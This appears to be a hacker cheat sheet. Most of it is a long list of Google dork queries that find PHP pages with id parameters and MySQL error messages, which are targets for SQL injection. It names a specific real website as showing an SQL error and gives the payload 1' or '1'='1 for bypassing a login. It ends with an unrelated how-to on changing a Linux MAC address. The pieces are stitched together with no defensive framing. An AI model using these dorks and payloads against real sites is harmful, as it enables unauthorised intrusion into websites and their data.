inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?id=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?id=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?id=
inurl:review.php?id=
inurl:iniziativa.php?id=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?id=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

sql error



sql error in http://www.ziza.co.in

username:1' or '1'='1
password: 1' or '1'='1

Sumit Shukla

How To Change The MAC Address In Linux?

First, type the following command to check the MAC:
ifconfig -a | grep HWaddr
(Note it somewhere so that you can reset it later)

Then type:
ifconfig eth0 down

ifconfig eth0 hw ether 00:70:5D:34:54:02
(Any MAC address you want to give)

ifconfig eth0 up

ifconfig -a | grep HWaddr
(To check your new MAc address)